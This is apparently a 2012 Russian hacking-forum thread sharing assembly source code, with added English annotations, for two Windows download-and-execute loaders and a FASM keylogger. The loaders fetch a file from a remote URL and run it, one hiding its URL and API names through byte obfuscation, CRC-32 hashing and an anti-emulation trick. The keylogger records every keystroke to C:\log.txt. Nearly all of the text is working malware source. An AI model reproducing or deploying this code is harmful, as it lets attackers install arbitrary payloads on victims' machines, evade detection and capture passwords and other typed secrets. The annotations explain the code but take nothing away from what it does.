
Сорцы на asm'e

Тема в разделе "Исходные коды", создана пользователем r00t, 11 май 2012.


    Различные сорцы на асме
    [MASM] Downloader Small
    Код:
    ; ---------------------------------------------------------------
    ; [MASM] "Downloader Small" -- annotated for analysis.
    ; 32-bit Windows code with an empty .data section and no declared
    ; imports: every API is resolved at run time by cGetProcAddress
    ; (below), which walks the PEB loader list and parses the kernel32
    ; export table by hand.  The code is position-independent: ebp holds
    ; the load delta and all inline data is addressed as [ebp+offset X].
    ; Behaviour worth recognising in a sample: fs:[30h] PEB access,
    ; manual export-table parsing, URLDownloadToFileA followed by
    ; ShellExecuteA on the downloaded file, then ExitProcess.
    ; ---------------------------------------------------------------
    .386
    .model flat, stdcall
    option casemap :none
    .data
    .code
    start:
    call delta_jmp                          ; pushes the runtime address of delta_jmp
    delta_jmp:
    pop eax                                 ; eax = runtime address of delta_jmp
    mov ebp,eax
    sub ebp,offset delta_jmp                ; ebp = load delta (runtime - link-time address)
    push ebp                                ; saved across the jump; restored at mDat
    jmp mDat                                ; skip the inline data that follows
    ; Inline data.  s* = NUL-terminated ASCII strings, x* = 4-byte slots
    ; that receive the resolved module handles / export addresses.
    sGetProcAddress db "GetProcAddress",0
    sLoadLibrary db "LoadLibraryA",0
    sUrlMon db "urlmon.dll",0
    sShell32 db "shell32.dll",0
    sURLDownloadToFileA db "URLDownloadToFileA",0
    sShellExecuteA db "ShellExecuteA",0
    sExitProcess db "ExitProcess",0
    sURL db "http://XXX.ru",0                ; download source (placeholder host in this sample)
    sFile db "putty.exe", 0                  ; local file name the download is written to and then executed
    xUrlMon dd 0                            ; urlmon.dll base
    xShell32 dd 0                           ; shell32.dll base
    xShellExecuteA dd 0
    xURLDownloadToFileA dd 0
    xExitProcess dd 0
    xGetProcAddress dd 0
    xLoadLibrary dd 0
    xKernelBase dd 0                        ; kernel32.dll base, filled by cGetProcAddress
    mDat:
    pop ebp                                 ; restore the load delta saved above
    Call cGetProcAddress                    ; fills xKernelBase/xGetProcAddress; returns eax = 0 on failure, which is not tested here
    ;GetProcAddress (LoadLibraryA)
    lea eax, [ebp+offset sLoadLibrary]
    push eax                                ; lpProcName
    push [ebp+offset xKernelBase]           ; hModule = kernel32
    call [ebp+offset xGetProcAddress]
    mov [ebp + offset xLoadLibrary], eax
    ;LoadLibrary urlmon
    lea eax, [ebp+offset sUrlMon]
    push eax                                ; lpLibFileName
    call [ebp + offset xLoadLibrary]
    mov [ebp + offset xUrlMon], eax
    ;LoadLibrary shell32
    lea eax, [ebp+offset sShell32]
    push eax
    call [ebp + offset xLoadLibrary]
    mov [ebp + offset xShell32], eax
    ;GetProcAddress ShellExecute
    lea eax, [ebp+offset sShellExecuteA]
    push eax
    push [ebp+offset xShell32]
    call [ebp+offset xGetProcAddress]
    mov [ebp + offset xShellExecuteA], eax
    ;GetProcAddress URLDownloadToFile
    lea eax, [ebp+offset sURLDownloadToFileA]
    push eax
    push [ebp+offset xUrlMon]
    call [ebp+offset xGetProcAddress]
    mov [ebp + offset xURLDownloadToFileA], eax
    ;GetProcAddress ExitProcess (the original comment here repeated "URLDownloadToFile")
    lea eax, [ebp+offset sExitProcess]
    push eax
    push [ebp+offset xKernelBase]
    call [ebp+offset xGetProcAddress]
    mov [ebp + offset xExitProcess], eax
    ;Download File -- URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB)
    push 0                                  ; lpfnCB = NULL
    push 0                                  ; dwReserved = 0
    lea eax, [ebp+offset sFile]
    push eax                                ; szFileName
    lea eax, [ebp+offset sURL]
    push eax                                ; szURL
    push 0                                  ; pCaller = NULL
    call [ebp + offset xURLDownloadToFileA] ; return value (HRESULT) is not checked
    ;Execute File -- ShellExecuteA(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
    push 0                                  ; nShowCmd = 0 (SW_HIDE)
    push 0                                  ; lpDirectory = NULL
    push 0                                  ; lpParameters = NULL
    lea eax, [ebp+offset sFile]
    push eax                                ; lpFile = downloaded file
    push 0                                  ; lpOperation = NULL (default verb)
    push 0                                  ; hwnd = NULL
    call [ebp + offset xShellExecuteA]
    ;ExitProcess(0)
    push 0
    call [ebp + offset xExitProcess]
    ; ---------------------------------------------------------------
    ; cGetProcAddress -- locate kernel32.dll and its GetProcAddress
    ; export without using the import table.
    ; In:   ebp = load delta (for the [ebp+offset X] slots)
    ; Out:  [xKernelBase] = kernel32 base, [xGetProcAddress] = address
    ;       of GetProcAddress, eax = that address; eax = 0 on error
    ;       (bad PE signature or name not found).
    ; Clobbers: eax, ebx, ecx, edx, esi, edi, flags.
    ; ---------------------------------------------------------------
    cGetProcAddress:
    assume fs:nothing
    mov esi, FS:30h                         ; esi = PEB
    mov esi, [esi+ 0Ch]                     ; esi = PEB->Ldr
    mov esi, [esi+ 1Ch]                     ; esi = first link of InInitializationOrderModuleList
    next_module:
    ; Offsets below are relative to the InInitializationOrder link
    ; inside LDR_DATA_TABLE_ENTRY, hence +08h = DllBase, +20h = BaseDllName.Buffer.
    mov eax, [esi+08h]	                    ; eax = DllBase
    mov edi, [esi+20h]	                    ; edi = BaseDllName.Buffer (UTF-16)
    mov esi, [esi]	                      ; esi = next link
    cmp BYTE PTR [edi+12*2], al             ; al = low byte of DllBase (presumably 0 for a page-aligned base): require NUL at UTF-16 index 12, i.e. a 12-character name
    jne next_module
    cmp BYTE PTR [edi], 6Bh                 ; first character 'k' ...
    je find_kernel32_finished
    cmp BYTE PTR[edi], 4Bh                  ; ... or 'K'
    je find_kernel32_finished
    jmp next_module                         ; no exit condition: the list is circular, so with no match this presumably never terminates
    find_kernel32_finished:
    mov [ebp+offset xKernelBase], eax
    lea edi, [ebp+offset sGetProcAddress]   ; edi = export name to look up
    mov ebx, dword ptr [ eax + 3Ch]         ; e_lfanew
    add ebx, eax                            ; ebx = IMAGE_NT_HEADERS
    cmp word ptr [ebx], 4550h               ; "PE" signature check
    jnz    find_error
    mov    ebx, [ebx+78h]                   ; export directory RVA (DataDirectory[0])
    add    ebx, eax                         ; ebx = IMAGE_EXPORT_DIRECTORY
    mov    ecx, [ebx+18h]                   ; NumberOfNames
    dec    ecx                              ; ecx = highest name index; the table is scanned downward
    mov    edx, [ebx+20h]                   ; AddressOfNames RVA
    add    edx, eax                         ; edx = name pointer table
    find_loop:
    mov    esi, [edx+ecx*4]
    add    esi, eax                         ; esi = candidate export name (ASCIIZ)
    push    edi                             ; edi/eax/ebx are saved because al/bl serve as scratch below
    push    eax
    push    ebx
    cmp_loop:
    mov    al, byte ptr [esi]
    mov    bl, byte ptr [edi]
    sub    al, bl
    jne    cmp_different                    ; bytes differ
    add    bl, 0                            ; bytes equal; ZF set iff both strings ended (NUL)
    jz		  cmp_equal
    inc    esi
    inc    edi
    jmp    cmp_loop
    cmp_different:
    pop    ebx
    pop    eax
    pop    edi
    dec ecx
    cmp ecx, 0
    jne find_loop                           ; note: the loop stops when ecx reaches 0, so name index 0 is never compared
    jmp   short find_error
    cmp_equal:
    pop    ebx
    pop    eax
    pop    edi
    mov    edx, [ebx+24h]                   ; AddressOfNameOrdinals RVA
    add    edx, eax
    mov    cx, [edx+ecx*2]                  ; cx = ordinal of the matched name
    mov    edx, [ebx+1Ch]                   ; AddressOfFunctions RVA
    add    edx, eax
    mov    ebx, [edx+ecx*4]                 ; function RVA
    add    eax, ebx                         ; eax = kernel32!GetProcAddress
    push eax
    pop [ebp+offset xGetProcAddress]        ; memory-to-memory store via the stack
    ret
    find_error:
    xor    eax, eax                         ; eax = 0; xGetProcAddress stays 0, and the caller does not check
    ret
    end start
    
    [MASM] Lr Downloader

    Код:
    ; ---------------------------------------------------------------
    ; [MASM] "Lr Downloader" -- annotated for analysis.
    ; The URL and the other .data strings are stored obfuscated and are
    ; decoded in place by Crypt (adds 14 to each byte).  APIs are
    ; resolved by name hash through GetProcAddr (see the kernelbase.asm
    ; listing further down), so no import names appear in the binary.
    ; Before doing anything it runs a busy-wait delay (shit) and an
    ; SSE-instruction probe (antiemul).
    ; ---------------------------------------------------------------
    .486
    .model flat, stdcall
    option casemap :none
    .data
    Host db "Zffb,!![_Y$#) [_SYWeZSU] ge![_Y$#)!+')(!eT)TeY b`Y ",0   ; obfuscated download URL, decoded by Crypt at run time
    Save db 'c:\1.png ',0                   ; destination path (note the trailing space)
    vers db 'Lr Downloader ',0              ; passed through Crypt once; not otherwise used in the visible code
    .code
    include kernelbase.asm                  ; presumably the GetKernelBase/GetProcAddr/GetLoadLibrary/exit listing shown below
    include szTrim.asm
    start:
    call shit                               ; 5,000,000-iteration busy loop (delay)
    call antiemul                           ; executes raw SSE opcodes
    push offset Host
    call szTrim                             ; runs on the still-encoded bytes: Crypt only decodes Host later, inside DownloadAndExecute
    call DownloadAndExecute
    call exit                               ; does not return
    
    ; ---------------------------------------------------------------
    ; DownloadAndExecute -- decode Host, download it to Save, run Save.
    ; The DLL names are assembled byte by byte on the stack so they do
    ; not appear as contiguous strings in the image:
    ;   [ebp-11 .. ebp-1]  "urlmon.dll"
    ;   [ebp-23 .. ebp-12] "shell32.dll"
    ; Register roles: edx = LoadLibraryA (set by GetLoadLibrary),
    ; ebx = export resolved by GetProcAddr, edi = 0 (reused as NULL).
    ; GetProcAddr takes (unused, hModule, hash) and returns eax.
    ; Clobbers eax, ebx, edx, edi (ebx/edi are not preserved).
    ; ---------------------------------------------------------------
    DownloadAndExecute:
    push ebp
    mov ebp, esp
    sub esp, 18h                            ; 24 bytes of locals for the two stack strings
    mov byte ptr [ebp-11],'u'
    mov byte ptr [ebp-10],'r'
    mov byte ptr [ebp-9],'l'
    mov byte ptr [ebp-8],'m'
    mov byte ptr [ebp-7],'o'
    mov byte ptr [ebp-6],'n'
    mov byte ptr [ebp-5],'.'
    mov byte ptr [ebp-4],'d'
    mov byte ptr [ebp-3],'l'
    mov byte ptr [ebp-2],'l'
    mov byte ptr [ebp-1],0
    mov byte ptr [ebp-23],'s'
    mov byte ptr [ebp-22],'h'
    mov byte ptr [ebp-21],'e'
    mov byte ptr [ebp-20],'l'
    mov byte ptr [ebp-19],'l'
    mov byte ptr [ebp-18],'3'
    mov byte ptr [ebp-17],'2'
    mov byte ptr [ebp-16],'.'
    mov byte ptr [ebp-15],'d'
    mov byte ptr [ebp-14],'l'
    mov byte ptr [ebp-13],'l'
    mov byte ptr [ebp-12],0
    push offset vers
    call Crypt                              ; decodes vers in place; the result is never read
    call GetLoadLibrary                     ; edx = LoadLibraryA
    lea eax, dword ptr [ebp-11]
    push eax                                ; "urlmon.dll"
    call edx                                ; eax = urlmon base
    push 092C3D419h                         ; export-name hash (CRC-32, see GetProcAddr)
    push eax                                ; hModule = urlmon
    push 0                                  ; first argument is never read by GetProcAddr
    call GetProcAddr
    xchg ebx, eax                           ; ebx = resolved export; 5-argument call below matches URLDownloadToFileA (presumably; verify the hash)
    push offset Host
    call Crypt                              ; decode the URL in place
    xor edi, edi
    push edi                                ; lpfnCB = NULL
    push edi                                ; dwReserved = 0
    push offset Save                        ; szFileName
    push offset Host                        ; szURL (now decoded)
    push edi                                ; pCaller = NULL
    call ebx                                ; return value not checked
    
    call GetLoadLibrary                     ; edx = LoadLibraryA again
    lea eax, dword ptr [ebp-23]
    push eax                                ; "shell32.dll"
    call edx                                ; eax = shell32 base
    push 0318A988Bh                         ; export-name hash
    push eax                                ; hModule = shell32
    push 0
    call GetProcAddr
    xchg ebx, eax                           ; ebx = resolved export; 6-argument call below matches ShellExecuteA (presumably; verify the hash)
    push 5                                  ; nShowCmd = 5 (SW_SHOW)
    push edi                                ; lpDirectory = NULL
    push edi                                ; lpParameters = NULL
    push offset Save                        ; lpFile = downloaded file
    push edi                                ; lpOperation = NULL
    push edi                                ; hwnd = NULL
    call ebx
    leave
    ret
    ; Crypt -- in-place decode of a NUL-terminated string: adds 14 to
    ; every byte up to (not including) the terminator.
    ; In:   p = string address.  Out: string modified in place.
    ; Clobbers eax.  stdcall proc: ret becomes leave/ret 4.
    Crypt proc p:dword
    mov eax, p
    jmp @@begin                             ; test the first byte before transforming anything
    @@:
    add byte ptr [eax], 14
    inc eax
    @@begin:
    cmp byte ptr [eax], 0
    jnz @b
    ret
    Crypt endp
    
    ;Taken from Win32.Atix
    ; antiemul -- executes two hand-encoded SSE opcodes (per the original
    ; comments: comiss xmm0,xmm0 and cvtpi2ps xmm0,mm0).  Presumably an
    ; anti-emulation probe: an emulator that does not implement these
    ; instructions faults here instead of continuing.  Preserves eax;
    ; leaves xmm0/mm0 state modified.
    antiemul:
    push eax
    db 0fh, 02fh, 0c0h; comiss
    xor eax,eax ; junk
    db 0fh, 02ah, 0c0h;cvtpi2ps
    pop eax
    retn
    ; shit -- busy-wait delay: 5,000,000 iterations of register-only
    ; filler (sub/push/pop/xchg) with no effect other than elapsed time.
    ; Loop exit: `ja` needs CF=0 and ZF=0; CF comes from `cmp ecx,0`
    ; (never a borrow) and ZF from `dec ecx`, so it runs until ecx = 0.
    ; Clobbers eax, ebx, ecx.
    shit:
    mov ecx,5000000
    _loop:
    sub eax, eax
    push eax
    pop ebx
    xchg eax, ebx
    cmp ecx, 0
    dec ecx
    ja _loop
    retn
    end start[/HTML]
    
    
    
    HTML:
     assume fs: nothing
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxx
    ; GetKernelBase -- walk PEB->Ldr InMemoryOrderModuleList and return
    ; in eax the DllBase of the module whose hashed BaseDllName equals
    ; 6A4ABC5Bh (kernel32, per the routine's name).
    ; Hash: the first 24 bytes of the UTF-16 name, lower-case ASCII folded
    ; to upper, each byte added into a ror-13 accumulator (the scheme
    ; used by the Metasploit block_api stub).  Always hashes 24 bytes,
    ; regardless of the actual name length.
    ; All registers except eax are preserved (pushad/popad); eax is
    ; returned by writing its pushad slot at [esp+1Ch].
    ; No exit condition if nothing matches (the list is circular).
    GetKernelBase:
    pushad
    mov edx,dword ptr fs:[30h] ;get a pointer to the PEB
    mov edx,dword ptr [edx+0Ch] ;get PEB->Ldr
    mov edx,dword ptr [edx+14h] ;get the first module from the InMemoryOrder module list
    next_mod:
    mov esi,dword ptr [edx+28h]             ; esi = BaseDllName.Buffer (offsets are relative to the InMemoryOrder link)
    push 24
    pop ecx                                 ; ecx = 24 bytes to hash
    xor edi,edi                             ; edi = hash accumulator
    loop_modname:
    xor eax,eax
    lodsb                                   ; al = next byte of the UTF-16 name
    cmp al,'a' ;some versions of Windows use lower case module names
    jl not_lowercase
    sub al,20h                              ; fold to upper case
    not_lowercase:
    ror edi,13
    add edi,eax
    loop loop_modname
    cmp edi,6A4ABC5Bh                       ; flags kept across the two movs below
    mov ebx,dword ptr [edx+10h]             ; ebx = DllBase of this entry
    mov edx,dword ptr [edx]                 ; edx = next entry
    jne next_mod
    mov dword ptr [esp+1Ch],ebx             ; overwrite saved eax so popad returns the base
    popad
    ret
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx
    ; GetProcAddr(unused, hModule, hash) -- stdcall, cleans 0ch bytes.
    ; Scans hModule's export name table and returns in eax the VA of the
    ; export whose CRC-32 matches `hash`, or 0 if no name matches.
    ; CRC-32 details (all visible below): init -1, reflected polynomial
    ; 0EDB88320h applied bit-wise in two 16-bit halves (08320h/0edb8h),
    ; final complement; the state is kept as dx:cx.  The byte count is
    ; edi = strlen + 1, so the terminating NUL is included in the CRC.
    ; Stack args: [ebp+8] never read, [ebp+0ch] = module base,
    ;             [ebp+10h] = hash.
    ; Locals:     [ebp-4] name index, [ebp-8] AddressOfFunctions,
    ;             [ebp-0ch] AddressOfNames, [ebp-010h] AddressOfNameOrdinals,
    ;             [ebp-014h] NumberOfNames.
    ; Preserves esi, ebx, edi, edx, ecx.  Performs no validation of the
    ; PE headers (no "PE" signature or bounds check).
    GetProcAddr:
    push ebp
    mov ebp, esp
    add esp, -014h                          ; 20 bytes of locals
    push esi
    push ebx
    push edi
    push edx
    push ecx
    mov eax, dword ptr ss:[ebp+010h]
    xor edx, edx
    xchg eax, edx                           ; edx = target hash, eax = 0
    mov esi, 03ch
    add esi, dword ptr ss:[ebp+0ch]
    mov eax, dword ptr ds:[esi]             ; e_lfanew
    add eax, dword ptr ss:[ebp+0ch]         ; eax = IMAGE_NT_HEADERS
    mov esi, dword ptr ds:[eax+078h]        ; export directory RVA
    add esi, 018h                           ; -> NumberOfNames field
    add esi, dword ptr ss:[ebp+0ch]
    mov eax, dword ptr ds:[esi]
    mov dword ptr ss:[ebp-014h], eax        ; NumberOfNames
    add esi, 4                              ; -> AddressOfFunctions
    lea edi, dword ptr ss:[ebp-8]
    lods dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    stos dword ptr es:[edi]
    mov dword ptr ss:[ebp-8], eax           ; AddressOfFunctions (VA)
    lods dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    push eax                                ; AddressOfNames, popped into esi below
    stos dword ptr es:[edi]
    mov dword ptr ss:[ebp-0ch], eax         ; AddressOfNames (VA)
    mov eax, dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    mov dword ptr ss:[ebp-010h], eax        ; AddressOfNameOrdinals (VA)
    pop esi                                 ; esi = name pointer table
    mov dword ptr ss:[ebp-4], 0             ; index = 0
    local_2:
    mov eax, dword ptr ss:[ebp-4]
    cmp dword ptr ss:[ebp-014h], eax
    jnz local_7                             ; more names to test
    xor eax, eax                            ; exhausted: return 0
    pop ecx
    pop edx
    pop edi
    pop ebx
    pop esi
    leave
    retn 0ch
    local_7:
    push esi                                ; save table cursor
    mov eax, dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    xchg eax, edi                           ; edi = name VA
    mov ebx, edi                            ; ebx = name start
    push edi
    xor al, al
    local_6:
    scas byte ptr es:[edi]                  ; find the NUL; edi ends one past it
    jnz local_6
    pop esi                                 ; esi = name start
    sub edi, ebx                            ; edi = strlen + 1 (byte count for the CRC)
    push edx                                ; save target hash
    cld
    xor ecx, ecx
    dec ecx                                 ; cx = low CRC half = FFFFh
    mov edx, ecx                            ; dx = high CRC half = FFFFh
    local_3:
    xor eax, eax
    xor ebx, ebx
    lods byte ptr ds:[esi]
    xor al, cl                              ; table index = crc_low ^ byte
    mov cl, ch                              ; shift crc right by 8 (cl<-ch<-dl<-dh)
    mov ch, dl
    mov dl, dh
    mov dh, 8                               ; dh = bit counter
    local_4:
    shr bx, 1                               ; bx:ax >>= 1, low bit into CF
    rcr ax, 1
    jnb local_5
    xor ax, 08320h                          ; xor with 0EDB88320h when a 1 was shifted out
    xor bx, 0edb8h
    local_5:
    dec dh
    jnz local_4
    xor ecx, eax                            ; crc ^= table value
    xor edx, ebx
    dec edi
    jnz local_3
    not edx
    not ecx
    mov eax, edx
    rol eax, 010h
    mov ax, cx                              ; eax = dx:cx = final CRC-32
    pop edx                                 ; restore target hash
    cmp edx, eax
    je local_1
    pop esi
    add esi, 4                              ; next name pointer
    add dword ptr ss:[ebp-4], 1
    jmp local_2
    local_1:
    pop esi
    mov eax, dword ptr ss:[ebp-4]
    shl eax, 1
    add eax, dword ptr ss:[ebp-010h]        ; &AddressOfNameOrdinals[index]
    xor esi, esi
    xchg eax, esi
    mov ax, word ptr ds:[esi]               ; ax = ordinal
    shl ax, 2
    add eax, dword ptr ss:[ebp-8]           ; &AddressOfFunctions[ordinal]
    xchg eax, esi
    mov eax, dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]         ; eax = export VA
    pop ecx
    pop edx
    pop edi
    pop ebx
    pop esi
    leave
    retn 0ch
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxx
    ; GetLoadLibrary -- resolve the kernel32 export whose CRC-32 is
    ; 04134d1adh and return it in edx (and eax).  DownloadAndExecute
    ; calls edx with a DLL name and treats the result as a module base,
    ; i.e. this is used as LoadLibraryA.  Clobbers eax, edx.
    GetLoadLibrary:
    call GetKernelBase                      ; eax = kernel32 base
    push 04134d1adh                         ; hash
    push eax                                ; hModule
    push 0                                  ; unused
    call GetProcAddr
    mov edx, eax
    ret
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
    ; exit -- resolve the kernel32 export whose CRC-32 is 040f57181h and
    ; call it with a single argument of 0 (presumably ExitProcess(0),
    ; given the label).  There is no ret: the call is expected not to return.
    exit:
    call GetKernelBase                      ; eax = kernel32 base
    push 040f57181h                         ; hash
    push eax                                ; hModule
    push 0                                  ; unused
    call GetProcAddr
    push 0                                  ; uExitCode = 0
    call eax
    
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxx
    
    From masm32.lib
    HTML:
    ; szTrim (masm32.lib) -- in-place trim of the string at `src`:
    ; skips leading spaces/tabs, copies the rest down to the start, and
    ; terminates after the last byte >= 33.
    ; Returns eax = trimmed length, or 0 for an empty/all-whitespace
    ; string; ecx = src on the non-empty path.  Preserves esi/edi;
    ; clobbers eax, ecx, edx.
    ; NOTE(review): masm32 declares the parameter as `src:DWORD`; the
    ; colon appears to have been lost in the forum transcription.
    ; NOTE(review): edx is only assigned once a byte >= 33 has been
    ; copied, so a string whose first non-space/tab byte is a control
    ; character reaches `mov BYTE PTR [edi+edx], 0` with edx unset.
    szTrim proc srcWORD
    push esi
    push edi
    mov esi, src
    mov edi, src
    xor ecx, ecx
    sub esi, 1
    @@:
    add esi, 1
    cmp BYTE PTR [esi], 32 ; strip space
    je @B
    cmp BYTE PTR [esi], 9 ; strip tab
    je @B
    cmp BYTE PTR [esi], 0 ; test for zero after tabs and spaces
    jne @F
    xor eax, eax ; set EAX to zero on 0 length result
    mov BYTE PTR [edi], 0 ; set string length to zero
    jmp tsOut ; and exit
    @@:
    mov al, [esi+ecx] ; copy bytes from src to dst
    mov [edi+ecx], al
    add ecx, 1
    test al, al
    je @F ; exit on zero
    cmp al, 33 ; don't store positions lower than 33 (32 + 9)
    jb @B
    mov edx, ecx ; store count if asc 33 or greater
    jmp @B
    @@:
    mov BYTE PTR [edi+edx], 0 ; terminate after the last byte >= 33
    mov eax, edx ; return trimmed string length
    mov ecx, src
    tsOut:
    pop edi
    pop esi
    ret
    [Fasm] Keylogger 1,50 kb
    
    ; ---------------------------------------------------------------
    ; [FASM] Keylogger -- annotated for analysis.
    ; Sweeps GetAsyncKeyState over virtual-key codes 8..255 in a tight
    ; loop (Sleep(1) once per sweep); for any key reporting a non-zero
    ; state it maps the VK to a scan code, fetches the key name with
    ; GetKeyNameText and appends it to C:\log.txt.
    ; Recognisable behaviour: continuous GetAsyncKeyState polling across
    ; the whole VK range and repeated CreateFileA/WriteFile/CloseHandle
    ; on one fixed path.
    ; ---------------------------------------------------------------
    format PE GUI 5.0
    entry start
    include 'C:\fasm\include\win32a.inc'
    log db "C:\log.txt",0                   ; fixed output path
    buffer db 0x100 dup (?)                 ; 256-byte key-name buffer
    bytes_escritos dd 0                     ; lpNumberOfBytesWritten for WriteFile ("bytes written")
    
    start:
    mov esi,7                               ; esi = VK code; incremented before each test, so the sweep is 8..255
    invoke Sleep,1
    jmp gogo
    gogo:
    cmp esi,255
    je start                                ; sweep finished: start over
    inc esi
    invoke GetAsyncKeyState,esi
    cmp eax,0
    jnz logar                               ; any non-zero state is logged
    jmp gogo
    logar:
    invoke MapVirtualKey,esi,0              ; VK -> scan code
    shl eax,16                              ; GetKeyNameText takes the scan code in bits 16-23 of lParam
    invoke GetKeyNameText,eax,buffer,0x100
    
    invoke  CreateFile, log, GENERIC_WRITE, 0,  NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, NULL
    cmp eax,0
    je exit                                 ; the handle is only tested against 0
    mov ebx,eax                             ; ebx = file handle, kept across the invokes
    invoke SetFilePointer,ebx,0,0,FILE_END  ; append
    invoke lstrlen,buffer
    invoke WriteFile,ebx,buffer,eax,bytes_escritos,NULL
    invoke Sleep,100                        ; presumably to avoid re-logging a held key every sweep
    invoke CloseHandle,ebx
    jmp gogo
    exit:
    invoke ExitProcess,0
    
    ; Import directory: the only imported names, which is what a static
    ; look at this binary would show (kernel32 file/time APIs plus the
    ; three user32 keyboard-query APIs).
    data import
    library kernel,'KERNEL32.DLL',\
    user,'USER32.DLL'
    import kernel,\
    Sleep,'Sleep',\
    CreateFile,'CreateFileA',\
    WriteFile,'WriteFile',\
    SetFilePointer,'SetFilePointer',\
    CloseHandle,'CloseHandle',\
    lstrlen,'lstrlenA',\
    ExitProcess,'ExitProcess'
    import user,\
    GetAsyncKeyState, 'GetAsyncKeyState',\
    MapVirtualKey,'MapVirtualKeyA',\
    GetKeyNameText,'GetKeyNameTextA'
    end data				  